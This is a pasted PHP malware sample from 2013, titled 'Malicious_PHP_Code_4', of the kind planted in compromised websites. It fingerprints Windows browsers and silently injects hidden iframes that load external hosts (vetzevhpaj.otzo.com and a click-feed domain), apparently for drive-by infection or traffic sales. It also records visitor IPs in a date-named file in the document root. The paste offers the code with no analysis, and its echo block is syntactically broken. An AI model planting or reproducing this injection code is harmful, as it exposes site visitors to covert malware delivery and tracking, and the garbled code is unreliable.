
Malicious_PHP_Code_4
By:
kazu-sama on
Feb 6th, 2013 | syntax:
PHP | size: 1.53 KB | hits: 218 | expires: Never
<?php
error_reporting(0);
$ip = $_SERVER["REMOTE_ADDR"];
$dr = $_SERVER["DOCUMENT_ROOT"];
$ua = $_SERVER['HTTP_USER_AGENT'];
$odbf = $dr . '/' . md5(date('m.d.y'), time() - 86400);
if (file_exists($odbf))
@unlink($odbf);
$dbf = $dr . '/' . md5(date('m.d.y'));
if ((strpos($ua, 'Windows') !== false) && ((strpos($ua, 'MSIE') !== false) || (strpos($ua, 'Opera') !== false) || (strpos($ua, 'Firefox') !== false || (strpos($ua, 'Mozilla') !== false)) && (strpos(@file_get_contents($dbf), $ip) === false))) {
error_reporting(0);
echo (
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://vetzevhpaj.otzo.com/nt/stats.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://vetzevhpaj.otzo.com/nt/stats.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
);
if ($fp = @fopen($dbf, "a")) {
fputs($fp, $ip . '|');
fclose($fp);
}
} else
echo '<iframe style="visibility:hidden;position:absolute;left:0;top:0;" width="100" height="6" src="http://click.rndtrg.com/feed/frames.php?uid=99&frames=2"></iframe>';
if (file_exists("openinfo.php") OR isset($_REQUEST['dblink']) OR empty($dblink))
die("Cannot open file.");
?>